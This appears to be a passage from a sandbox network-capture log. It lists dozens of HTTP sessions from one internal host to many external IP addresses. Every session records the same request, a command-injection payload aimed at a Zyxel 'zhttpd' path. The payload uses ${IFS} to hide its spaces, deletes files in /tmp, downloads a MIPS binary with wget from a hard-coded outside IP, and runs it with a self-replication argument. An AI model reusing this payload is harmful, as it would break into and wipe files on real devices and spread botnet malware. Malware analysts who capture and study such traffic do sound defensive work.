                        Mar 12, 2024 08:50:39.211003065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2966192.168.2.1436448138.168.143.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211049080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2967192.168.2.1459804159.52.144.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211087942 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2968192.168.2.143617612.93.89.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211123943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2969192.168.2.1446692177.20.198.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211162090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2970192.168.2.1450772140.58.27.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211205006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2971192.168.2.143608887.183.205.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211261988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2972192.168.2.145874214.137.206.151443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211309910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2973192.168.2.1456954163.184.102.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211347103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2974192.168.2.144047249.202.208.180443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211385965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2975192.168.2.1454522189.172.148.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211421967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2976192.168.2.144167254.94.215.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211467028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2977192.168.2.1437146165.222.114.191443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211498976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2978192.168.2.144910887.45.153.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211529970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2979192.168.2.1456420195.193.175.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211565018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2980192.168.2.1438318210.53.107.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211623907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2981192.168.2.1447380111.192.46.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211663961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2982192.168.2.143300239.138.16.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211698055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2983192.168.2.144272053.1.189.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211743116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2984192.168.2.1432938106.144.92.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211786985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2985192.168.2.1442466163.147.235.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211816072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2986192.168.2.1460486106.135.93.149443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211877108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2987192.168.2.144577254.62.198.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211925030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2988192.168.2.144254838.208.98.77443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.211977959 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2989192.168.2.143811061.33.72.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212037086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2990192.168.2.144111282.37.112.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212068081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2991192.168.2.145684098.114.111.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212095022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2992192.168.2.1443654131.185.172.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212140083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2993192.168.2.146031877.248.238.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212198019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2994192.168.2.143793061.165.180.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212229013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2995192.168.2.1434672205.22.88.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212256908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2996192.168.2.1457186150.127.32.182443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212313890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2997192.168.2.1447576172.231.80.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212368965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2998192.168.2.1449476132.106.21.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212423086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2999192.168.2.144132651.67.58.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212470055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3000192.168.2.1446994116.104.66.200443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212546110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3001192.168.2.145173088.143.123.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212588072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3002192.168.2.144061042.235.154.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212618113 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3003192.168.2.1445380142.190.216.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212622881 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3004192.168.2.1451696128.213.8.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212660074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3005192.168.2.1456020165.6.12.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212696075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3006192.168.2.144025637.105.208.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212732077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3007192.168.2.146097252.221.249.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212778091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3008192.168.2.1445194148.159.123.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212815046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3009192.168.2.143835866.184.168.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212867975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3010192.168.2.145778439.97.2.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212887049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3011192.168.2.1434076145.174.20.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212928057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3012192.168.2.143498296.166.162.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.212975979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3013192.168.2.1443824139.67.243.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213011026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3014192.168.2.144397697.240.85.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213047028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3015192.168.2.144036082.184.147.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213104963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3016192.168.2.1453412182.72.7.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213139057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3017192.168.2.1459838190.29.207.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213181019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3018192.168.2.1440026207.126.125.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213234901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3019192.168.2.1456394109.70.214.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213260889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3020192.168.2.1436856202.120.32.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213330030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3021192.168.2.1455588109.244.9.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213352919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3022192.168.2.1459386219.250.200.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213398933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3023192.168.2.1435316108.80.7.115443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213439941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3024192.168.2.143955438.230.29.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213460922 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3025192.168.2.1459368208.231.31.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213517904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3026192.168.2.1451058110.223.28.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213556051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3027192.168.2.144619288.91.67.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213593006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3028192.168.2.1440542104.170.154.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213641882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3029192.168.2.143791844.237.59.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213656902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3030192.168.2.1435006181.206.187.148443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213717937 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3031192.168.2.145556273.83.65.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213745117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3032192.168.2.1445760107.199.120.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213793993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3033192.168.2.1433194112.200.62.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213852882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3034192.168.2.1442330149.66.246.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:39.213854074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
